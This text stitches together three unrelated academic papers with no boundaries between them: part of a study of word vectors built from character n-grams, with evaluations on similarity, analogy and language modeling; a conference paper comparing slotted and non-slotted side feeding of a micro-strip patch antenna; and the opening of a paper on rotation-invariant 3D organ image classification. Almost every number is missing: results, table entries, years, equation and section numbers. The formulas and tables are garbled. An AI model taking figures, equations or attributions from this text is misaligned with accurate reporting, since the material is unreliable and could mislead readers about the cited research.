baselines is more important for morphologically rich languages, such as czech and german. . comparison with morphological representations we also compare our approach to previous work on word vectors incorporating subword information on word similarity tasks. the methods used are: the recursive neural network of luong et al. ( ), the morpheme cbow of qiu et al. ( ) and the morphological transformations of soricut and och ( ). in order to make the results comparable, we trained our model on the same datasets as the meth- ods we are comparing to: the english wikipedia data released by shaoul and westbury ( ), and the news crawl data from the wmt shared task for german, spanish and french. we also compare our approach to the log-bilinear language model introduced by botha and blunsom ( ), which was trained on the europarl and news com- mentary corpora. again, we trained our model on the same data to make the results comparable. us- ing our model, we obtain representations of out-of- vocabulary words by summing the representations of character n-grams. we report results in table . 
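The construction of out-of-vocabulary vectors just mentioned, summing the vectors of the character n-grams a word contains, can be sketched as follows. Here ngram_vectors is assumed to be a mapping from n-gram strings to trained numpy arrays, and the vector dimension is a placeholder; n-grams never seen in training are simply skipped, which is one reasonable convention for a sketch.

```python
import numpy as np

def char_ngrams(word, n_min=3, n_max=6):
    """Character n-grams of a word wrapped in the boundary symbols < and >."""
    w = "<" + word + ">"
    return [w[i:i + n] for n in range(n_min, n_max + 1)
            for i in range(len(w) - n + 1)]

def oov_vector(word, ngram_vectors, dim=300):
    """Represent an out-of-vocabulary word as the sum of the vectors
    of the character n-grams it contains."""
    vec = np.zeros(dim)
    for g in char_ngrams(word):
        if g in ngram_vectors:
            vec += ngram_vectors[g]
    return vec

def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))

# e.g. compare an unseen German compound against a word seen in training
# (hypothetical dictionaries ngram_vecs and word_vecs):
# cosine(oov_vector("tischtennisplatte", ngram_vecs), word_vecs["tennis"])
```

Since cosine similarity is scale-invariant, summing or averaging the n-gram vectors produces identical similarity rankings.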
we observe that our simple approach performs well relative to techniques based on subword information obtained from morphological segmentors. we also observe that our approach outperforms the soricut and och ( ) method, which is based on prefix and suffix analysis. the large improvement for ger- man is due to the fact that their approach does not model noun compounding, contrary to ours. . effect of the size of the training data since we exploit character-level similarities between words, we are able to better model infrequent words. therefore, we should also be more robust to the size of the training data that we use. in order to as- sess that, we propose to evaluate the performance of our word vectors on the similarity task as a func- tion of the training data size. to this end, we train our model and the cbow baseline on portions of wikipedia of increasing size. we use the wikipedia corpus described above and isolate the first , , , , , and percent of the data. since we don’t reshuffle the dataset, they are all subsets of each other. we report results in fig. . as in the experiment presented in sec. . , not all words from the evaluation set are present in the wikipedia data. again, by default, we use a null vector for these words (sisg-) or compute a vec- tor by summing the n-gram representations (sisg). the out-of-vocabulary rate is growing as the dataset shrinks, and therefore the performance of sisg- and cbow necessarily degrades. however, the pro- posed model (sisg) assigns non-trivial vectors to previously unseen words. first, we notice that for all datasets, and all sizes, the proposed approach (sisg) performs better than percentage of data sp e a rm a n r a n k cbow sisg- sisg (a) de-gur percentage of data sp e a rm a n r a n k cbow sisg- sisg (b) en-rw figure : influence of size of the training data on performance. we compute word vectors following the proposed model using datasets of increasing size. in this experiment, we train models on a fraction of the full wikipedia dump. the baseline. however, the performance of the base- line cbow model gets better as more and more data is available. our model, on the other hand, seems to quickly saturate and adding more data does not always lead to improved results. second, and most importantly, we notice that the proposed approach provides very good word vectors even when using very small training datasets. for in- stance, on the german gur dataset, our model (sisg) trained on % of the data achieves better performance ( ) than the cbow baseline trained on the full dataset ( ). on the other hand, on the en- glish rw dataset, using % of the wikipedia corpus we achieve a correlation coefficient of which is better than the performance of cbow trained on the full dataset ( ). this has a very important practi- cal implication: well performing word vectors can be computed on datasets of a restricted size and still work well on previously unseen words. in gen- eral, when using vectorial word representations in specific applications, it is recommended to retrain the model on textual data relevant for the applica- tion. however, this kind of relevant task-specific data is often very scarce and learning from a reduced amount of training data is a great advantage. . effect of the size of n-grams the proposed model relies on the use of character n- grams to represent words as vectors. as mentioned in sec. . , we decided to use n-grams ranging from to characters. 
this choice was arbitrary, moti- vated by the fact that n-grams of these lengths will cover a wide range of information. they would in- clude short suffixes (corresponding to conjugations and declensions for instance) as well as longer roots. in this experiment, we empirically check for the in- fluence of the range of n-grams that we use on per- formance. we report our results in table for en- glish and german on word similarity and analogy datasets. we observe that for both english and german, our arbitrary choice of - was a reasonable deci- sion, as it provides satisfactory performance across languages. the optimal choice of length ranges depends on the considered task and language and should be tuned appropriately. however, due to the scarcity of test data, we did not implement any proper validation procedure to automatically select the best parameters. nonetheless, taking a large range such as − provides a reasonable amount of subword information. this experiment also shows that it is important to include long n-grams, as columns corresponding to n ≤ and n ≤ work best. this is especially true for german, as many nouns are compounds made up from several units that can only be captured by longer character sequences. on analogy tasks, we observe that using larger n-grams helps for seman- tic analogies. however, results are always improved by taking n ≥ rather than n ≥ , which shows that character -grams are not informative for that task. as described in sec. . , before computing (a) de-gur (b) de semantic (c) de syntactic (d) en-rw (e) en semantic (f) en syntactic table : study of the effect of sizes of n-grams considered on performance. we compute word vectors by using character n-grams with n in {i, . . . ,j} and report performance for various values of i and j. we eval- uate this effect on german and english, and represent out-of-vocabulary words using subword information. character n-grams, we prepend and append special positional characters to represent the beginning and end of word. therefore, -grams will not be enough to properly capture suffixes that correspond to con- jugations or declensions, since they are composed of a single proper character and a positional one. . language modeling in this section, we describe an evaluation of the word vectors obtained with our method on a language modeling task. we evaluate our language model on five languages (cs, de, es, fr, ru) using the datasets introduced by botha and blunsom ( ). each dataset contains roughly one million training tokens, and we use the same preprocessing and data splits as botha and blunsom ( ). our model is a recurrent neural network with lstm units, regularized with dropout (with proba- bility of . ) and weight decay (regularization pa- rameter of − ). we learn the parameters using the adagrad algorithm with a learning rate of . , clipping the gradients which have a norm larger than . . we initialize the weight of the network in the range [− . , . ], and use a batch size of . two baselines are considered: we compare our ap- proach to the log-bilinear language model of botha and blunsom ( ) and the character aware lan- guage model of kim et al. ( ). we trained word vectors with character n-grams on the training set of the language modeling task and use them to ini- tialize the lookup table of our language model. we report the test perplexity of our model without using pre-trained word vectors (lstm), with word vectors pre-trained without subword information (sg) and with our vectors (sisg). 
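One way to picture the step of initializing the language model's lookup table with pre-trained vectors, as described above, is the following sketch. PyTorch is only an assumption here, since the text does not name the framework used for the language-modeling experiments, and the layer sizes, dropout rate, learning rate, and clipping threshold are placeholders rather than the values reported in the text.

```python
import torch
import torch.nn as nn

class SubwordInitLM(nn.Module):
    """LSTM language model whose embedding table is initialized
    from pre-trained (subword-based) word vectors."""
    def __init__(self, pretrained, hidden_size=512, dropout=0.5):
        super().__init__()
        vocab_size, dim = pretrained.shape
        self.embed = nn.Embedding(vocab_size, dim)
        # the initialization step: copy pre-trained vectors into the lookup table
        self.embed.weight.data.copy_(torch.as_tensor(pretrained))
        self.lstm = nn.LSTM(dim, hidden_size, batch_first=True)
        self.drop = nn.Dropout(dropout)
        self.out = nn.Linear(hidden_size, vocab_size)

    def forward(self, tokens):
        h, _ = self.lstm(self.drop(self.embed(tokens)))
        return self.out(self.drop(h))

# Adagrad with weight decay and gradient-norm clipping, mirroring the recipe above
# (numeric values are placeholders):
# model = SubwordInitLM(pretrained_matrix)
# opt = torch.optim.Adagrad(model.parameters(), lr=0.1, weight_decay=1e-5)
# loss.backward(); torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0); opt.step()
```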
the results are presented in table . we observe that initializing the lookup table of the language model with pre-trained word represen- tations improves the test perplexity over the base- line lstm. the most important observation is that using word representations trained with subword in- formation outperforms the plain skipgram model. we observe that this improvement is most signifi- cant for morphologically rich slavic languages such as czech ( % reduction of perplexity over sg) and russian ( % reduction). the improvement is less significant for roman languages such as spanish ( % reduction) or french ( % reduction). this shows the importance of subword information on the language modeling task and exhibits the usefulness cs de es fr ru vocab. size k k k k k clbl canlm lstm sg sisg table : test perplexity on the language modeling task, for different languages. we compare to two state of the art approaches: clbl refers to the work of botha and blunsom ( ) and canlm refers to the work of kim et al. ( ). of the vectors that we propose for morphologically rich languages. qualitative analysis . nearest neighbors. we report sample qualitative results in table . for selected words, we show nearest neighbors accord- ing to cosine similarity for vectors trained using the proposed approach and for the skipgram base- line. as expected, the nearest neighbors for com- plex, technical and infrequent words using our ap- proach are better than the ones obtained using the baseline model. . character n-grams and morphemes we want to qualitatively evaluate whether or not the most important n-grams in a word correspond to morphemes. to this end, we take a word vector that we construct as the sum of n-grams. as de- scribed in sec. . , each word w is represented as the sum of its n-grams: uw = ∑ g∈gw zg. for each n-gram g, we propose to compute the restricted rep- resentation uw\g obtained by omitting g: uw\g = ∑ g′∈g−{g} zg′. we then rank n-grams by increasing value of cosine between uw and uw\g. we show ranked n-grams for selected words in three languages in table . for german, which has a lot of compound nouns, we observe that the most important n-grams cor- word n-grams autofahrer fahr fahrer auto freundeskreis kreis kreis> <freun de grundwort wort wort> grund sprachschule schul hschul sprach tageslicht licht gesl tages anarchy chy <anar narchy monarchy monarc chy <monar kindness ness> ness kind politeness polite ness> eness> en unlucky <un cky> nlucky lifetime life <life time starfish fish fish> star submarine marine sub marin transform trans <trans form finirais ais> nir fini fr finissent ent> finiss <finis finissions ions> finiss sions> table : illustration of most important character n- grams for selected words in three languages. for each word, we show the n-grams that, when re- moved, result in the most different representation. respond to valid morphemes. good examples in- clude autofahrer (car driver) whose most important n-grams are auto (car) and fahrer (driver). we also observe the separation of compound nouns into mor- phemes in english, with words such as lifetime or starfish. however, for english, we also observe that n-grams can correspond to affixes in words such as kindness or unlucky. interestingly, for french we ob- serve the inflections of verbs with endings such as ais>, ent> or ions>. . word similarity for oov words as described in sec. . , our model is capable of building word vectors for words that do not appear in the training set. 
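The n-gram ranking used in the qualitative analysis above, in which each n-gram g is scored by how much the word vector changes when g is omitted, can be sketched as follows; this is a simplified illustration that assumes the word's n-gram vectors are available in a dictionary.

```python
import numpy as np

def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))

def important_ngrams(ngram_vectors):
    """Rank a word's n-grams by increasing cosine between the full word vector
    u_w = sum_g z_g and the restricted vector with one n-gram removed; the
    n-grams listed first change the representation the most when omitted."""
    full = sum(ngram_vectors.values())
    return sorted(ngram_vectors,
                  key=lambda g: cosine(full, full - ngram_vectors[g]))

# e.g. for "autofahrer" the top-ranked n-grams would ideally be "fahr"/"fahrer" and "auto"
```

The same n-gram vectors are what give out-of-vocabulary words, discussed next, a non-trivial representation.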
for such words, we simply aver- age the vector representation of its n-grams. in or- der to assess the quality of these representations, we analyze which of the n-grams match best for oov words by selecting a few word pairs from the en- glish rw similarity dataset. we select pairs such that one of the two words is not in the training vo- cabulary and is hence only represented by its n- grams. for each pair of words, we display the cosine similarity between each pair of n-grams that appear query tiling tech-rich english-born micromanaging eateries dendritic sisg tile tech-dominated british-born micromanage restaurants dendrite flooring tech-heavy polish-born micromanaged eaterie dendrites sg bookcases technology-heavy most-capped defang restaurants epithelial built-ins .ixic ex-scotland internalise delis p table : nearest neighbors of rare words using our representations and skipgram. these hand picked examples are for illustration. figure : illustration of the similarity between character n-grams in out-of-vocabulary words. for each pair, only one word is oov, and is shown on the x axis. red indicates positive cosine, while blue negative. in the words. in order to simulate a setup with a larger number of oov words, we use models trained on % of the wikipedia data as in sec. . . the re- sults are presented in fig. . we observe interesting patterns, showing that sub- words match correctly. indeed, for the word chip, we clearly see that there are two groups of n-grams in microcircuit that match well. these roughly cor- respond to micro and circuit, and n-grams in be- tween don’t match well. another interesting ex- ample is the pair rarity and scarceness. indeed, scarce roughly matches rarity while the suffix -ness matches -ity very well. finally, the word preado- lescent matches young well thanks to the -adolesc- subword. this shows that we build robust word rep- resentations where prefixes and suffixes can be ig- nored if the grammatical form is not found in the dictionary. conclusion in this paper, we investigate a simple method to learn word representations by taking into account subword information. our approach, which incor- porates character n-grams into the skipgram model, is related to an idea that was introduced by schütze ( ). because of its simplicity, our model trains fast and does not require any preprocessing or super- vision. we show that our model outperforms base- lines that do not take into account subword informa- tion, as well as methods relying on morphological analysis. we will open source the implementation of our model, in order to facilitate comparison of fu- ture work on learning subword representations. acknowledgements we thank marco baroni, hinrich schütze and the anonymous reviewers for their insightful comments. references andrei alexandrescu and katrin kirchhoff. . fac- tored neural language models. in proc. naacl. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by model- ing characters instead of words with lstms. in proc. emnlp. marco baroni and alessandro lenci. . distribu- tional memory: a general framework for corpus-based semantics. computational linguistics, ( ): – . giacomo berardi, andrea esuli, and diego marcheg- giani. . word embeddings go to italy: a com- parison of models and training datasets. italian infor- mation retrieval workshop. piotr bojanowski, armand joulin, and tomáš mikolov. . alternative structures for character-level rnns. in proc. iclr. jan a. botha and phil blunsom. . 
compositional morphology for word representations and language modelling. in proc. icml. xinxiong chen, lei xu, zhiyuan liu, maosong sun, and huanbo luan. . joint learning of character and word embeddings. in proc. ijcai. grzegorz chrupała. . normalizing tweets with edit scripts and recurrent neural embeddings. in proc. acl. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proc. icml. ryan cotterell and hinrich schütze. . morphologi- cal word-embeddings. in proc. naacl. qing cui, bin gao, jiang bian, siyu qiu, hanjun dai, and tie-yan liu. . knet: a general frame- work for learning word embedding using morpholog- ical knowledge. acm transactions on information systems, ( ): : – : . scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): – . cicero nogueira dos santos and maira gatti. . deep convolutional neural networks for sentiment analysis of short texts. in proc. coling. cicero nogueira dos santos and bianca zadrozny. . learning character-level representations for part-of- speech tagging. in proc. icml. lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the concept revisited. in proc. www. alex graves. . generating sequences with recurrent neural networks. arxiv preprint arxiv: . . iryna gurevych. . using the structure of a concep- tual network in computing semantic relatedness. in proc. ijcnlp. zellig s harris. . distributional structure. word, ( - ): – . samer hassan and rada mihalcea. . cross-lingual semantic relatedness using encyclopedic knowledge. in proc. emnlp. colette joubarne and diana inkpen. . comparison of semantic similarity for different languages using the google n-gram corpus and second-order co-occurrence measures. in proc. canadian conference on artificial intelligence. yoon kim, yacine jernite, david sontag, and alexan- der m rush. . character-aware neural language models. in proc. aaai. maximilian köper, christian scheible, and sabine schulte im walde. . multilingual reliability and “semantic” structure of continuous word spaces. proc. iwcs . angeliki lazaridou, marco marelli, roberto zamparelli, and marco baroni. . compositionally derived representations of morphologically complex words in distributional semantics. in proc. acl. wang ling, chris dyer, alan w. black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proc. emnlp. kevin lund and curt burgess. . producing high-dimensional semantic spaces from lexical co- occurrence. behavior research methods, instruments, & computers, ( ): – . minh-thang luong and christopher d. manning. . achieving open vocabulary neural machine translation with hybrid word-character models. in proc. acl. thang luong, richard socher, and christopher d. man- ning. . better word representations with recur- sive neural networks for morphology. in proc. conll. tomáš mikolov, ilya sutskever, anoop deoras, hai-son le, stefan kombrink, and jan černocký. . sub- word language modeling with neural networks. tech- nical report, faculty of information technology, brno university of technology. tomáš mikolov, kai chen, greg d. corrado, and jeffrey dean. a. 
efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomáš mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in adv. nips. alexander panchenko, dmitry ustalov, nikolay arefyev, denis paperno, natalia konstantinova, natalia loukachevitch, and chris biemann. . hu- man and machine judgements for russian semantic relatedness. in proc. aist. siyu qiu, qing cui, jiang bian, bin gao, and tie-yan liu. . co-learning of word representations and morpheme representations. in proc. coling. benjamin recht, christopher re, stephen wright, and feng niu. . hogwild: a lock-free approach to parallelizing stochastic gradient descent. in adv. nips. david e. rumelhart, geoffrey e. hinton, and ronald j. williams. . neurocomputing: foundations of research. chapter learning representations by back- propagating errors, pages – . mit press. haşim sak, murat saraclar, and tunga gungör. . morphology-based and sub-word language modeling for turkish speech recognition. in proc. icassp. hinrich schütze. . dimensions of meaning. in proc. ieee conference on supercomputing. hinrich schütze. . word space. in adv. nips. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in proc. acl. cyrus shaoul and chris westbury. . the westbury lab wikipedia corpus. radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in proc. naacl. charles spearman. . the proof and measurement of association between two things. the american jour- nal of psychology, ( ): – . henning sperr, jan niehues, and alexander waibel. . letter n-gram-based input encoding for contin- uous space language models. in proc. of the workshop on continuous vector space models and their compo- sitionality at acl. ilya sutskever, james martens, and geoffrey e hinton. . generating text with recurrent neural networks. in proc. icml. lukáš svoboda and tomáš brychcin. . new word analogy corpus for exploring embeddings of czech words. in proc. cicling. peter d. turney, patrick pantel, et al. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . john wieting, mohit bansal, kevin gimpel, and karen livescu. . charagram: embedding words and sentences via character n-grams. in proc. emnlp. torsten zesch and iryna gurevych. . automatically creating datasets for measures of semantic relatedness. in proc. workshop on linguistic distances. xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text clas- sification. in adv. nips. paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) the comparison on the side feed mode of micro-strip patch wen dang department of communication and information xi'an technology university lane , yanta road, beilin district, xian, china e-mail: @ .com xinliang liu department of communication and information xi'an technology university lane , yanta road, beilin district, xian, china e-mail: @qq.com abstract—the feeding of the micro-strip patch is flexible and complex, especially side feeding. in this paper, a single micro- strip patch antenna with a center frequency of . ghz is taken as an example to explore the performance of the slotted feed and non-slotted feed and verified in hfss . . combined with hfss . 
software simulation and theoretical calculation, the corresponding conclusions can be obtained. the theoretical value and simulation results will be shown that: the required / converter sizes of the non-slotted side feed and slotted side feed are different. by contrasting with sizes of two feeding modes, electrical size of the slotted feed is smaller. it can be known that all performances of the slotted feed are more superior. keywords-hfss simulation; micro-strip patch; side-feed; slot; matching i. introduction antenna is a necessary component for radiating and receiving radio waves in engineering systems such as wireless communications, radio and television, navigation, satellite, radar and other engineering systems. the micro- strip patch is simple and easy to plastic, its feeding modes are flexible and changeable. the stability of the antenna can be also affected by micro-strip patch feeding mode. the different feeding mode has different properties. the design of the feeding system determines the current distribution of the radiation patch. the more consistent the current direction is, the higher the gain is, the greater the energy is, and the better the directivity is [ ]. therefore, in an antenna system, it is especially important that how the feeding system should design, which determines the stability of the system and the quality of microwave devices. in this paper, two different side feed modes of the radiation patch are analyzed and compared. by simulating the cell structure of the micro-strip patch antenna with the center frequency f at . ghz in hfss . , the corresponding sizes of the / impedance converter and intrinsic impedance are different, when the feeding position is not the same place, which has been validated in hfss . . the mode following the theoretical sizes calculated by given equations is simulated in hfss . . the simulation results have been drawn the followings. for the non-slotted side feed, the radiation impedance is caused by the edge impedance of the patch. the theoretical calculated / converter has a large error between the length and width values. to achieve the minimum s at the center frequency, it is necessary to optimize the micro-strip line parameters for several times. for the slotted side feed, the radiation impedance is produced by the edge impedance of the patch and the edge impedance of the groove. the theoretical value of the / converter has a higher accuracy. the best performance of the center frequency can be achieved by adjusting the width and depth of the slotted feeding. based on the above conditions, the minimum value of the antenna s can be obtained, the smaller the reflection energy is, the greater the transmission efficiency is. ii. design and analysis of radiation patch unit in this paper, the radiation patch of the center frequency f = . ghz would be used as an example, the thickness h of the substrate with rogers is . mm, its dielectric constant is . . according to the formula ( ) – ( ) [ ] - [ ] , it can be obtained that the width w, length l were mm and . mm respectively, as well as the input impedance. the width w of radiation patch is the following:          r f c w   where c is the speed of free space wave. 
taking into account the edge shortening effect, the actual length l of the radiation patch should be expressed as: l f c l e    where e  is the effective permittivity, l is the length of the equivalent radiation gap, they can be calculated by using the following formulas respectively. e             w h rr    international conference on sensor network and computer engineering (icsnce )       . . . . . e    hw hw hl e    the input impedance can be obtained as following:    )(cos z g zy in    where g is the radiation conductance, β is the phase constant in the medium, and z is the distance from the feed point to the radiation patch edge. it can be concluded that the different input impedance can be obtained by selecting different feeding point positions. a. radiation patch unit the length and width of the radiation patch can be calculated by formulas ( )-( ). the edge impedance of the radiation patch can be obtained by formula ( ). the length and width of the / impendence converter can be known by the edge impedance. the width and length of the Ω intrinsic impedance can be also counted. according to the optimum sizes, the model can be built in hfss . shown in fig. . the size of the slotted micro-strip patch can be also calculated by the same method. the optimum sizes can be obtained after many optimizations, it can be built in hfss . shown in fig. . figure . slotted patch antenna after hfss . simulation, the results are obtained in tableⅠ. the simulation results obtained by the two feeding methods are basically the same. the theoretical sizes of the slotted feed is closer to the simulated ones, even almost identical, and its electrical size is smaller. when optimizing in the way of the slotted feed, the workloads can be greatly reduced and the efficiency can be improved. b. verification in order to verify the rationality of the above conclusions, the input port can be excited by the wave port with a Ω load. when the width of the micro-strip line is w and the medium thickness is h, the height of the wave port is generally set to ~ h. when there is w >h, the width of the wave port is set to w . when there is w <h, the width of the wave port is generally set to w or ~ h [ ]. according to the rules, it can be built and verified in hfss . . the size and impedance of each port are shown in tableⅠ. from tableⅠ, it can be seen that the impedance value can be directly gotten by adding wave-port excitation for the converter as the input impedance, after running in hfss . . the slotted feed mode is closer to the theoretical value than the non-slotted feed mode. thus, the slotted feed mode can improve the efficiency of the operation and reduce the workload. c. comparison and new discoveries of two feed modes in the micro-strip feed, the return loss can be affected by the size of the / converter. the reflected voltage wave in the circuit can be reduced by proper using the / converter, the loss can be also reduced. the different performances of slotted and non-slotted feed are shown in tableⅠ. . mm mm mm mm mm mm figure . no slotted patch antenna . mm . mm mm mm mm . m m m figure . slotted patch antenna international conference on sensor network and computer engineering (icsnce ) table i. comparison between the slotted and non-slotted feeding ( unit: mm ) the slotted the non-slotted optimization optimization calculation the length of patch . . . 
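Before the comparison in Table I below, it is convenient to collect the transmission-line design relations to which formulas (1)-(6) above correspond, in their standard textbook form (e.g., Balanis), for a rectangular patch at resonant frequency f0 on a substrate of height h and permittivity εr, together with the quarter-wave transformer used for matching. These are given as reference forms rather than as a transcription of the paper's own expressions.

```latex
% Patch width
W = \frac{c}{2 f_0}\sqrt{\frac{2}{\varepsilon_r + 1}}

% Effective permittivity of the microstrip line (W/h \ge 1)
\varepsilon_e = \frac{\varepsilon_r + 1}{2}
              + \frac{\varepsilon_r - 1}{2}\left(1 + 12\,\frac{h}{W}\right)^{-1/2}

% Edge extension due to fringing, and the physical resonant length
\Delta L = 0.412\, h\,
  \frac{(\varepsilon_e + 0.3)\,(W/h + 0.264)}{(\varepsilon_e - 0.258)\,(W/h + 0.8)},
\qquad
L = \frac{c}{2 f_0 \sqrt{\varepsilon_e}} - 2\,\Delta L

% Input resistance at a feed point a distance z from the radiating edge
% (G is the radiation conductance of one slot; mutual conductance neglected)
R_{in}(z) \approx \frac{1}{2G}\,\cos^{2}\!\left(\frac{\pi z}{L}\right)

% Quarter-wave transformer matching the patch edge resistance R_e to a Z_0 feed line
Z_{\lambda/4} = \sqrt{Z_0\, R_e}
```

At the patch edge (z = 0) the input resistance reduces to 1/(2G), which the quarter-wave section then transforms to the feed-line impedance.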
the wide of patch . the port of / converter length . . wide . . impedance . Ω . Ω . Ω the port of Ω length . . Ω wide impedance . Ω . Ω Ω substrate thickness h . . . the wide of the slotted the length of the slotted s - . db - . db gain . db . db size mm . mm bandwidth . % . % reduction % from tableⅠ, it can be concluded that the electrical size of the slotted feed is slightly smaller than the electrical size of the non-slotted feed, in that case where the return loss, the gain and bandwidth of the same patch are substantially consistent. the theoretical value of the slotted feed size is closer to the optimum value. therefore, when the micro-strip arrays are formed, the advantages of the slotted feed are more obvious. iii. conclusion according to comparison and analysis of the simulation results of the two feeding methods, the following conclusions can be drawn: the value of the s is closely related with the size of the micro-strip line, especially the width of the micro-strip line. the impact of the width play important role, the center frequency and the ideal value can be coincident by adjusting the width. the value of s can be made better by adjusting the length, so that the feed network can achieve full match. the / converter ( z ) of the non-slotted feed is determined by the micro-strip characteristic impedance (zl) and the edge impedance (zl) of the patch. similarly, the edge impedance of the slotted feed patch is mainly caused by the edge of the slot and the radiation patch. the edge impedance and micro-strip line impedance can be calculated in hfss . by directly adding wave port excitation. after calculation, the impedance z values can be gotten as shown in tableⅠ. in short, all performances of the slotted feed are better than ones of the non-slotted feed. in the feed mode selection, the slotted feed is a relatively stable feeding method. iv. the development prospect and significance in the paper, by comparing the performances of two different feeding methods[ ], it could been seen that performances of all aspects of slotted feed are even better. when the slotted feed is matched, the theoretical value is more accurate without too much optimization, saving a lot of time and improving the simulation efficiency, which provides a good foundation for the micros-trip antenna array. the slotted radiation patch reduces the electrical size of the patch greatly, so that the antenna structure is more compact and miniaturization. this will be the future development tendency of micro-strip antennas. today, micro-strip theory is mature and widely used. with the wide application and great development of micro- strip antenna in the fields of satellite communication [ ], millimeter-wave [ ] and mobile communication, the research of micro-strip planar antenna technology [ ] will become one of the hotspots in future antenna research. at present, the compact profile of the antenna is a welcomed developed tendency [ ] - [ ]. the sizes of the radiation patch, whether it is as a unit patch micro-strip antenna, or as the array antenna unit array, affect the antenna resonance point and other performances. stable basic unit structure will be provided broadband for the micro-strip patch as good foundation. acknowledgement i would like to thank all my teachers who have helped me to develop the fundamental and essential academic competence. my sincere appreciation also goes to all the teachers and students who helped me. references [ ] s. l. s. yang, k. f. lee, and a. a. 
kishk, “ design and study of wideband signal feed circularity polarized microstrip antenna, ” progress in electromagnetics research, pier , – , international conference on sensor network and computer engineering (icsnce ) [ ] huynh, t. and k. f. lee, “single-layer single-patch wideband microstrip antenna,” electron. lett., vol. , no. , – , aug. . [ ] bhalla, r. and l. shafai, “resonance behavior of single u-slot microstrip patch antenna,” microwave and optical technology letters, vol. , no. , – , march . [ ] z. pi and f. khan, “an introduction to millimeter-wave mobile broadband systems,” ieee commun. mag., vol. , no. , pp. – , jun. . [ ] e. arnieri, l. boccia, g. amendola, and g. di massa, “a compact high gain antenna for small satellite applications,” ieee trans. antennas propag., vol. , no. , pp. – , feb. . [ ] k. l. wong, compact and broadband microstrip antennas. hoboken, nj: wiley, . [ ] s. k. podilchak, m. caillet, d. lee, y. m. m. antar, l. chu, m. hammar, d. caldwell, and e. barron, “a compact circularly polarized antenna using anarray of folded-shorted patches,” ieee trans. antennas propagation, vol. , no. , pp. – , sept. . [ ] li mingyang. liu yang.design of hfss antenna [m]. beijing: electronic industry press, . [ ] john klaus• antenna (third edition, volume ) [m]. beijing: electronic industry press, . [ ] deng weibo. analysis of characteristics of high frequency monopole antenna on dielectric plane [j]. journal of electronics & information technology, , ( ). [ ] li xiangqiang. liu qingxiang. zhao liu.et. -ring -element high power radial line helical array antenna. high power laser and partiacl beams. . ( ): - . submitted november accepted february published march corresponding author kh tohidul islam, kh.tohidulislam@gmail.com academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright islam et al. distributed under creative commons cc-by . open access a rotation and translation invariant method for d organ image classification using deep convolutional neural networks kh tohidul islam, sudanthi wijewickrema and stephen o’leary department of surgery (otolaryngology), university of melbourne, melbourne, victoria, australia abstract three-dimensional ( d) medical image classification is useful in applications such as disease diagnosis and content-based medical image retrieval. it is a challenging task due to several reasons. first, image intensity values are vastly different depending on the image modality. second, intensity values within the same image modality may vary depending on the imaging machine and artifacts may also be introduced in the imaging process. third, processing d data requires high computational power. in recent years, significant research has been conducted in the field of d medical image classification. however, most of these make assumptions about patient orientation and imaging direction to simplify the problem and/or work with the full d images. as such, they perform poorly when these assumptions are not met. in this paper, we propose a method of classification for d organ images that is rotation and translation invariant. to this end, we extract a representative two-dimensional ( d) slice along the plane of best symmetry from the d image. we then use this slice to represent the d image and use a -layer deep convolutional neural network (dcnn) to perform the classification task. 
we show experimentally, using multi-modal data, that our method is comparable to existing methods when the assumptions of patient orientation and viewing direction are met. notably, it shows similarly high accuracy even when these assumptions are violated, where other methods fail. we also explore how this method can be used with other dcnn models as well as conventional classification approaches. subjects artificial intelligence, computer vision, data mining and machine learning keywords deep learning, medical image processing, image classification, symmetry, d organ image classification introduction with the rapid growth of medical imaging technologies, a large volume of d medical images of different modalities such as magnetic resonance imaging (mri), computed tomography (ct), and positron emission tomography (pet) has become available (research & markets, ). this has resulted in the formation of large medical image databases that offer opportunities for evidence-based diagnosis, teaching, and research. within this context, the need for the development of d image classification methods has risen. for example, d medical image classification is used in applications how to cite this article islam kt, wijewickrema s, o’leary s. . a rotation and translation invariant method for d organ image classification using deep convolutional neural networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:kh.tohidulislam@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. such as computer aided diagnosis (cad) and content-based medical image retrieval (cbmir) (zhou et al., ; kumar et al., ). in recent years, many algorithms have been introduced for the classification of d medical images (arias et al., ; mohan & subashini, ). both conventional classification methods and deep learning have been used for this purpose. for example, Öziç & Özşen ( ) proposed a voxel-based morphometry method to transform d voxel values into a vector to be used as features in a support vector machine (svm) in order to identify patients with alzheimer’s disease using mr images. bicacro, silveira & marques ( ) investigated the classification of d brain pet images into three classes: alzheimer’s disease, mild cognitive impairment, and cognitively normal. to this end, they used three different feature extraction approaches (volumetric intensity, d haar-like (cui et al., ), and histogram of oriented gradients (hog) (dalal & triggs, )) and trained a svm using these features. morgado, silveira & marques ( ) also performed a similar classification (alzheimer’s disease, mild cognitive impairment, and cognitively normal) for pet brain images. they used d and d local binary patterns as texture descriptors to extract features and performed the classification task using a svm. a d image classification method was proposed by liu & dellaert ( ) for the pathological classification of brain ct images (captured by the same scanner) as normal, (evidence of) blood, or stroke. first, in a pre-processing step, they manually realigned all images so that the mid-sagittal plane was at the middle of the image. then, considering the symmetry of the image, they extracted image features from half of each d slice (in the superior-inferior direction) and used kernel regression for classification. 
